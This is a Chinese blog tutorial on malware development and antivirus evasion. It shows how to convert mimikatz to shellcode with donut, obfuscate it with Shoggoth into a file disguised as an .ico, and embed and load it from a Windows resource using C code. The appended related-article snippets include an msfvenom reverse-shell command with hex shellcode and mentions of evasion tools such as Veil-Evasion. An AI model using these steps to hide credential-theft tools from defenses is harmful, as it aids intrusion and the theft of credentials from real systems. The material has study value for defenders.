【Maldev--Defense Evasion 免杀】(一)从Resource中加载shellcode

最新推荐文章于 2024-05-27 09:30:05 发布
最新推荐文章于 2024-05-27 09:30:05 发布
阅读量633 收藏 8
点赞数 14
分类专栏: Maldev 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/williamzou1999/article/details/135043113
版权

前言

在开发malware过程中通常有两种加载shellcode方式:

1.把shellcode直接以硬编码的方式写入代码中
2.采用分离加载的方式 制作一个shellcode loader 从本地读取shellcode到内存中进行运行。

本文先讲解第一种方式,这个方式有一定的缺陷。

  • 把shellcode与loader放一起编写。即使shellcode 进行了加密与混淆操作,把成品放到vt上进行扫描也很大概率被查杀。
  • 如果要对工具进行免杀,则需把工具 exe转为shellcode 写成c语言格式则有上千行。若把它粘贴到vs2019等IDE去可能会直接程序无响应了。所以可以把转换出来的shellcode可以写进资源(Resource)中。

零、 所需要的工具

  • VS2019
  • donut https://github.com/TheWover/donut
  • Shoggoth https://github.com/frkngksl/Shoggoth
  • 使用C语言 Win32编程

一、需要的Windows API

HRSRC FindResourceA(
[in, optional] HMODULE hModule,
[in]           LPCSTR  lpName,
[in]           LPCSTR  lpType
);

lpName: 可以使用MAKEINTRESOURCE(ID)获取
lpType:RT_RCDATA Application-defined resource (raw data).

HGLOBAL LoadResource(
  [in, optional] HMODULE hModule,
  [in]           HRSRC   hResInfo
);

LPVOID LockResource(
  [in] HGLOBAL hResData
);
LPVOID VirtualAlloc(
  [in, optional] LPVOID lpAddress,
  [in]           SIZE_T dwSize,
  [in]           DWORD  flAllocationType,
  [in]           DWORD  flProtect
);

二、具体步骤

将所需要免杀的工具转成shellcode

donut.exe -i .\mimikatz.exe -o mimi.bin

在这里插入图片描述
使用多态加密混淆工具混淆下shellcode
Shoggoth.exe -i .\mimi.bin -s 1235sfafsf -o mimi_fin.ico
在这里插入图片描述

打开VS2019

在这里插入图片描述
在资源文件中添加资源文件(rc)

在这里插入图片描述
导入生成的mimi_fin.ico(注意后缀名)

在这里插入图片描述
输入RCDATA 即可

代码编写

#include <stdio.h>
#include<Windows.h>
#include"resource.h"

void PrintHexData(LPCSTR Name, PBYTE Data, SIZE_T Size) {

    printf("unsigned char %s[] = {", Name);

    for (int i = 0; i < Size; i++) {
        if (i % 16 == 0) {
            printf("\n\t");
        }
        if (i < Size - 1) {
            printf("0x%0.2X, ", Data[i]);
        }
        else {
            printf("0x%0.2X ", Data[i]);
        }
    }

    printf("};\n\n\n");

}
int main()
{
    HRSRC hRSrc = NULL;
    HGLOBAL hGlobal = NULL;
    LPVOID  pTmpShellcode = NULL;
    LPVOID  pShellcode = NULL;
    size_t sShellcodeSize = 0;
    hRSrc= FindResource(NULL, MAKEINTRESOURCEW(IDR_RCDATA1), RT_RCDATA);  //确定shellcode资源在模块中的位置
    if (!hRSrc) {
        printf("资源未找到!\n");
        return -1;
    }
    hGlobal=LoadResource(NULL, hRSrc);                                     //获取句柄
    if (!hGlobal) {
        printf("加载资源失败\n");
        return -1;
    }
    pTmpShellcode =LockResource(hGlobal);                                      //找到资源所在内存中的地址
    if (!pTmpShellcode) {
        printf("获取资源中shellcode地址失败");
        return -1;
    }
    sShellcodeSize=SizeofResource(NULL,hRSrc);
    if (!sShellcodeSize ) {
        // in case of function failure 
        printf("获取shellcode大小失败\n");
        return -1;
    }
    pShellcode= VirtualAlloc(NULL, sShellcodeSize, MEM_COMMIT, PAGE_READWRITE);
    if (pShellcode) {
        MoveMemory(pShellcode, pTmpShellcode, sShellcodeSize);
    }
    else
    {
        printf("内存分配失败\n");
        return -1;
    }
    printf("[+]pShellcode的地址为:%p\n",pShellcode);
    printf("[+]sShellcodeSize的大小为%d\n", sShellcodeSize);
    PrintHexData("shellcode", pShellcode, sShellcodeSize);
    return 0;
}

在这里插入图片描述

总结

这篇文章先讲到把Mimikatz的shellcode加载进内存 。下篇继续讲解!
由于本人才疏学浅,有所错误请师傅们多多指教!

FireGhost~
关注
  • 14
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vs怎么生成exe_将任意exe转换为shellcode
weixin_35377028的博客
01-26 2134
shellcode也经常在免杀以及渗透扮演重要的作用。由于windows shellcode开发难度比较大,使用传统软件生成的shellcode功能都比较少。记得以前在学校玩ms17-010时,需要提供一个shellcode来执行命令,那时shellcode只能用msfvenom,这还需要我安装linux,有时候安装完就下课了。在那时候就想研究,如何将任意exe转换为shellcode...
maldev-for-dummies:一款功能强大的恶意软件研究平台
二狗的博客
02-07 270
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:当然除了有配套的视频,同时也为大家整理了各种文档和书籍料&工具,并且已经帮大家分好类了。
题目:探索Maldev——Golang的恶意软件开发库
gitblog_00007的博客
05-27 302
题目:探索Maldev——Golang的恶意软件开发库 maldevGolang library for malware development项目地址:https://gitcode.com/gh_mirrors/mal/maldev 项目介绍 在网络安全领域,有时我们需要深入研究恶意软件的工作原理以提高防御能力。Maldev是一个由D3Ext创建的开源Golang库,专门用于恶意软件开发和红...
探索神秘的技术殿堂:Maldev-Academy 的 HellHall 项目
gitblog_00005的博客
04-27 805
探索神秘的技术殿堂:Maldev-Academy 的 HellHall 项目 项目地址:https://gitcode.com/Maldev-Academy/HellHall 项目简介 HellHall 是一个由 Maldev-Academy 创建并维护的开源项目,旨在为技术爱好者提供一个学习和实践 Web 开发技能的平台。该项目以其独特的“地狱之门”主题和丰富的互动元素吸引着初级到高级开发者参...
免杀工具--veil-evasion
11-21
免杀工具--veil-evasion】是一种在网络安全领域常用的工具,主要用于对抗反病毒软件和入侵检测系统,使得恶意代码能够避开检测并执行。它通常被安全研究人员、渗透测试人员以及恶意攻击者使用,目的是为了提升...
2022-2024常用经典免杀技术汇总!
03-27
网络安全领域,免杀技术(Evasion)是指恶意软件开发者使用的一种策略,旨在逃避安全软件的检测和防御机制。免杀技术通常涉及多种方法和技术,包括但不限于代码混淆、行为隐藏、利用系统漏洞以及对抗反病毒引擎。...
NimShellCodeLoader:使用nim编写的shellcode加载
02-03
Nim编写Windows平台shellcode免杀加载器 快速生成免杀毒性文件 更新: 20210123:增加三种加载shellcode方式,其两种使用了库,需要安装该库才能正常编译 特点: 1:自带通常加载方式 2:可自行拓展加载方式 3:...
Veil-Evasion-master.zip
04-03
Veil-Evasion-master.zip文件可能包含了Veil-Evasion项目的完整源代码、文档、示例和依赖项。下载后,用户需要按照项目文档的指示进行编译和安装,以便在本地环境运行。在安装和使用过程,可能需要安装Python...
Phantom-Evasion:Python防病毒规避工具
05-25
幻影逃生3.0 Phantom-Evasion是一款使用python编写的防病毒逃避工具(均与python和python3兼容),即使使用最常见的x86 msfvenom有效负载,它也能够生成(几乎)完全无法检测到的可执行文件。 以下操作系统正式支持...
go-shellcode:将Shellcode加载到新进程
02-06
壳码 这是一个将shellcode作为自己的进程运行的程序,所有程序均来自内存。 这样做是为了击败反病毒检测。 用法 请记住,只有64位shellcode将在64位进程运行。 这无法自动检测您的Shellcode架构。 使用msfvenom或metasploit以十六进制格式生成一些shellcode: $ msfvenom -p windows/meterpreter/reverse_tcp -f hex -o rev.hex LHOST=127.0.0.1 LPORT=4444 c:\windows\temp>sc.exe fce8820000006089e531c0648b5030
shellcode帮助工具,直接把exe转shellcode
12-29
Shellcode Helper v1.62 Coded by TeLeMan (c) 2008-2013 Usage: schelper.exe [options] Options: -i [input file] input file (Default: stdin) -o [output file] output file (Default: stdout) -s input file format (Default: Auto-Detection) -sb input file format is Binary -sp the input file format's parameters -d output file format (Default: C format) -db output file format is Binary -dp the output file format's parameters -search get the start offset by the pattern: e.g. PK\x03\x04 -soff fix the match offset after searching (Default: 0) -off convert the input file from the offset (Default: 0) -len convert the input file with the length (Default: 0 - MAX) -en [encoder] encode shellcode (Default: XorDword) -de [encoder] decode shellcode (Default: Auto-Detection) -ex exclude characters: e.g. 0x00,0x01-0x1F,0xFF (Default: 0x00) -in incude characters only -ep the encoder's parameters -t [pid] execute or inject shellcode into process for testing -td [pid] execute or inject shellcode into process for debugging -stack put shellcode into stack and execute it (ESP is the shellcode start) -noinfo display no normal messages except error messages Available formats: 0 - C 1 - C(HexArray) 2 - Perl 3 - Python 4 - Ruby 5 - JavaScript(Escape) 6 - VBScript(Escape) 7 - Pascal 8 - MASM(Data) 9 - HexDump 10 - BitString 11 - HexString 12 - HexArray(C like) 13 - Base64 14 - Binary 15 - HexString(C like) 16 - HexString(Escape) 17 - HexString(JavaScript,UNICODE) 18 - URI(ISO-8859-1) 19 - XML(PCDATA) 20 - BigNumber 21 - BigNumber(Hex) 22 - BigNumber(BaseX) 23 - FloatPoint 24 - UnixTimestamp 25 - GUID 26 - MASM(ASM) 27 - NASM 28 - YASM(ASM) 29 - FASM(ASM) 30 - JWASM(ASM) 31 - POASM(ASM) 32 - GOASM(ASM) 33 - GNU ASM Available encoders:
使用 donut 将 exe 转成 shellcode
hambaga的博客
01-19 4665
donut可以将C语言编写的EXE 转成shellcode免杀shellcode免杀exe简单得多。 donut 可以在github上下载,下面直接给出命令,将一个32位EXE转成shellcode。 .\donut -f .\Sharphound.exe -a1 具体参数请看文档。执行该命令会得到一个payload.bin,是二进制shellcode,你可以写一个程序把它转成C语言的数组,在程序调用就行了。 ...
Shellex:针对shellcode的转换与处理工具,2024年最新高级网络安全开发必看
m0_55030688的博客
04-18 332
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!如果你能答对70%,找一个安全工作,问题不大。最后给大家分享一份全套的网络安全学习料,给那些想学习 网络安全的小伙伴们一点帮助!对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习料!对于从来没有接触过网络安全的同学,我们帮你准备了详细的。源较为敏感,未展示全面,需要的最下面获取。
【MSFconsole进阶】evasion(免杀模块):免杀模块使用方法,相关设置
05-24 1628
【渗透工具】MSFconsole进阶:evasion(免杀模块)
Evasion 使用及实际免杀测试
时乙的博客
10-06 832
kali升级到5.0之后,有了一个新的模块Evasion,这个文章我就去测试一下Evasion生成的木马的实际免杀效果。 360版本:13.0.0.2002 备用木马库:2021-10-05 360杀毒:5.0.0.8140 火绒版本:5.0.63.2 病毒库:2021-09-29 Evasion使用 msfconsole进入msf show evasion 查看Evasion所提供的模块 一、evasion/windows/windows_defender_exe...
远控免杀专题文章(4)-Evasion模块免杀(VT免杀率12/71)
Ms08067安全实验室
02-19 636
本专题文章导航1、远控免杀专题文章(1)-基础篇:https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg2、远控免杀专题文章(2)-msfve...
远控免杀4---Evasion免杀
qq_41683305的博客
03-10 482
0x01 免杀能力一览表 1、下表标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass。 2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。 3、由于本机测试时只是安装了360全家桶和火绒,所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(2019.12....
Veil-Evasion更换依赖镜像源
最新发布
06-09
Veil-Evasion是一个用于对抗恶意软件检测的工具,它可能涉及到修改依赖项或切换到特定的镜像源以获取所需的库。在更换依赖项的镜像源时,通常你需要遵循以下步骤: 1. **确认当前依赖**:首先,查看Veil-Evasion项目的`requirements.txt`或`setup.py`文件,了解需要哪些特定版本的依赖库。 2. **选择新镜像源**:确定你想要使用的镜像源,常见的有Python的官方PyPI(https://pypi.org/),阿里云的Mirrors(https://mirrors.aliyun.com/pypi/),或者Docker Hub的Registry(https://hub.docker.com/)等。 3. **更新`requirements.txt`**:如果使用`requirements.txt`,直接替换原有库的URL为新的镜像源地址。例如,如果你的旧版本是`pip install package==version`,换成新的镜像源可能是`pip install https://mirrors.aliyun.com/simple/package/version.whl`。 4. **使用虚拟环境**:为了防止系统级的包冲突,建议在虚拟环境操作,可以使用`virtualenv`或`conda`创建一个新的环境,然后在这个环境安装依赖。 5. **安装依赖**:在虚拟环境运行`pip install -r requirements.txt`,这会根据新指定的镜像源下载并安装库。 6. **测试Veil-Evasion**:安装完成后,确保Veil-Evasion能正常运行和功能无误。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值